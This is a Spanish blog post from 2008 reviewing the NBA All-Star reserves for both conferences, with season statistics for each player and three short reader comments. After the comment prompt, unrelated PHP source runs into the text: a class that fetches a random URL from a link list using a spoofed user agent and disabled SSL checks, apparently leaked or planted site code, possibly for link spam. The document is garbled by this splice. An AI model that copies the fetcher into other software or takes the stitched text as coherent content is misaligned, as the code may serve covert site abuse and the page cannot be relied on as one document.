Suplentes del All-Star Game

04 de February de 2008 por Viva_Dirk

allstarneworleanslogoHace unos días se conocieron los suplentes para el partido de las estrellas, donde finalmente no estará el base extremeño José Manuel Calderón. Joe Johnson fue el último en entrar en la conferencia Este con 9 puntos de los entrenadores, mientras que Calderón y Ray Allen quedaron con 3. Antes de ver a los componentes de ambos banquillos cabe destacar que con la salida de Jason Kidd en el aire puede darse un hecho nunca visto, que un jugador votado como titular en una conferencia estuviese jugando en la otra cuando llegue el All-Star. Como hecho sin precedentes, no sabemos qué medidas tomaría el comisionado.

Los suplentes en la Conferencia Este son:

billupssmileChauncey Billups: Es el líder de los Pistons que marchan con un récord de 33-13. Sus 17.8 puntos y 7.1 asistencias no están nada mal, pero Billups destaca en Detroit por su sangre fría y saber hacer en los momentos importantes. Es uno de los 11 jugadores que tirando 4 triples o más por encuentro se mantienen por encima del 40% y su 90.7% en tiros libres es la mejor marca de aquellos que han tirado al menos 200 veces desde la línea. A sus 30 años participará por tercera vez en un All-Star Game.riphamiltondunks

Richard Hamilton: Una de las elecciones más discutidas por el público, el escolta de los Pistons está realizando una buena temporada con los mejores porcentajes de tiro de su carrera. Sus 18.9 puntos, 3.3 rebotes y 4.4 asistencias quedan fríos frente al casi doble-doble que promedia Calderón desde que es titular en Toronto, los 20-5-5 de Carter o el temporadón de Turkoglu con 19.5 puntos, 6.2 rebotes y 4.3 asistencias. Visto que Detroit ya estaba representado por Billups, parece excesiva la aparición de Hamilton en el que será su tercer All-Star Game.

joejohnsonhawksJoe Johnson: La otra elección discutida. Muchos ven inferior su temporada a la de los 3 nombrados anteriormente, aunque Johnson tiene en Atlanta la responsabilidad de anotar y repartir juego por la falta de un base (al igual que Turkoglu). Lidera a los Hawks en puntos anotados con 21.2 y asistencias con 5.3, pero sus porcentajes rozan el 40% y es uno de los jugadores menos intensos en defensa de los Hawks. Ésta será su segunda aparición en el All-Star Game.paulpiercearmsup

Paul Pierce: El capitán de los Celtics jugará su sexto partido All-Star en la que es su primera temporada como segundo de abordo en Boston. Pierce está viviendo una temporada plácida al lado de Garnett y Allen. Sus 20.3 puntos, 5.7 rebotes y 4.9 asistencias, además de una gran implicación en la mejor defensa de la liga, no dejan lugar a dudas de su categoría de All-Star.

caronbutlershoutCaron Butler: Impresionante temporada la de este alero de 27 años que en ausencia de Arenas lidera a los Wizars junto con Jamison al récord de 24-21 que tienen ahora mismo, y que le sirve para acudir por segunda vez al All-Star. Es 16º en anotación con 21.9 puntos, 3º en robos de balón con 2.4, aparece entre los 50 primeros en rebotes con 7, también entre los 50 primeros en asistencias con 4.3, y su 48.1% en en tiros le sitúa líder junto a Lebron James entre los jugadores exteriores que anotan más de 20 puntos. Resumiendo, una pasada.jamisonwallpaper

Antawn Jamison: Casi a la altura de su compañero Butler está siendo la campaña del ex de North Carolina. Desde el puesto de ala-pívot, Jamison despliega una gran gama de recursos ofensivos, desde un mortal tiro de 3 hasta movimientos destacables en el poste. 21.1 puntos y 10.5 rebotes le hacen ser uno de los 5 jugadores que alcanzan la mágica cifra del 20-10 en su promedio. Ésta será su segunda participación en el partido de las estrellas.

chrisboshraptorChris Bosh: A sus 23 años el líder de los Raptors jugará su tercer All-Star Game. Capaz de mostrarse expeditivo en defensa y fino en ataque, Bosh ha superado la etiqueta de jugador blando que algunos le pusieron en sus primeros años en la liga. Con 22.7 puntos, 9.1 rebotes, 2.1 asistencias, 1 robo y 1.2 tapones por partido, el compañero de Calde está completando una gran temporada que tendrá que refrendar en Playoffs tras su fracaso personal el año pasado.

En la Conferencia Oeste tenemos a:stevenash13

Steve Nash: A punto de cumplir 34 años, el base canadiense sigue ofreciendo unas prestaciones asombrosas. A casi nadie sorprenden ya sus 17.4 puntos y 11.9 asistencias, pero a muchos nos sigue asombrando su 51.9% en tiros de campo y 48% en triples (el mejor de los que han intentado al menos 200), amén de que sigue por encima del 90% en tiros libres. Éste será su 6º All-Star Game.

chrispaulthumbupChris Paul: En su tercera campaña en la liga, el base de New Orleans jugará su primer All-Star Game. Con sólo 22 años, Paul es el primer jugador de la historia en promediar 20 puntos, 10 asistencias y 2 robos, y asusta hasta dónde puede llegar. Líder de la competición en robos con 2.6, segundo en asistencias con 10.9 y noveno en puntos con 22.7, con un 48.1% en tiros de campo; para un sector del público es a día de hoy el gran candidato al MVP.brandonroylaugh

Brandon Roy: Otro de los debutantes, en esta ocasión en su segunda temporada en la liga. Se trata de un rara avis, ya que Roy no es un gran lanzador de 3, no juega habitualmente por encima del aro, ni siquiera es de los mejores desde la línea de tiros libres, pero es sin duda un jugadorazo. Sobrio como pocos, su principal virtud es la inteligencia con la que juega. Desde la posición de escolta es capaz de organizar a su equipo y acertar con sus decisiones. Esperando la llegada de Oden, Roy está en 19.3 puntos, 4.5 rebotes y 5.4 asistencias.

davidwestshootDavid West: El último de los debutantes, le llega la oportunidad con 27 años y 4 temporadas en la liga. West se caracteriza por ser un gran anotador, pero no baja el nivel en el apartado reboteador e intimidador. En el equipo que más está funcionando como tal, David comparte protagonismo ofensivo con Paul y Stojakovic y pese a ello alcanza los 19.6 puntos. Y teniendo a Chandler a su lado también captura 9.4 rebotes.dirknowitzki41

Dirk Nowitzki: El actual MVP de la liga disputará su 7º All-Star Game. El alemán tiene todas sus miras puestas en los Playoffs tras conseguir ya todo lo posible durante la liga regular. Dirk promedia 22.5 puntos, 8.6 rebotes y 3.8 asistencias, con un 48.6% en tiros. Tuvo un inicio de campaña flojo, y durante los meses de diciembre y enero ha vuelto a su nivel habitual.

carlosboozerscreamCarlos Boozer: Espera quitarse la espina de no haber podido disputar el año pasado su primer All-Star, y la que es su segunda elección le servirá para jugar su primer partido de las estrellas. Es otro de los 20-10 de la competición, concretamente 22.4 puntos y 10.6 rebotes, con un 54.9% en tiros es lo que hace a Boozer un indiscutible en la cita. Lidera junto a Deron Williams a los Jazz, actualmente al frente de la Northwest con un récord de 29-18.amaredunksmavs

Amare Stodemire: El pívot de 25 años disputará su tercer All-Star. Después de sus gravísimos problemas con las lesiones, Amare ha vuelto a sus anteriores números: 22.6 puntos, 9 rebotes y 2.6 tapones son la marca que deja Stoudemire este curso. Su sociedad con Nash es la más prolífica de la liga, con un entendimiento casi telepático. Pese a todo se ha rumoreado su salida desde que comenzó 2008.

Ausencia notable la de Baron Davis, un jugador hecho para este tipo de eventos, habitual en las 10 mejores jugadas del día, lidera a los Warriors con 21.9 puntos, 8.1 asistencias y 2.5 robos, pero no nos atrevemos a decir que se lo merezca más que ninguno de los componentes del Oeste.

Comenta

3 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Buen analisis viva

      Citar

  2. MagicJohnson32 dice:
    #2

    Al margen de Baron, es una lástima que se hayan quedado fuera Turkoglu y Calderón, que están enormes y con sus equipos más arriba que los Hawks (por Joe Johnson lo digo). Y, no sé, con uno de los dos Pistons ya iban servidos ¿no?

      Citar

  3. xapa_croack dice:
    #3

    el all star es una fiesta para los americanos, no para los extranjeros, solo les gustan cuadrados y saltarines, nada de calidad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>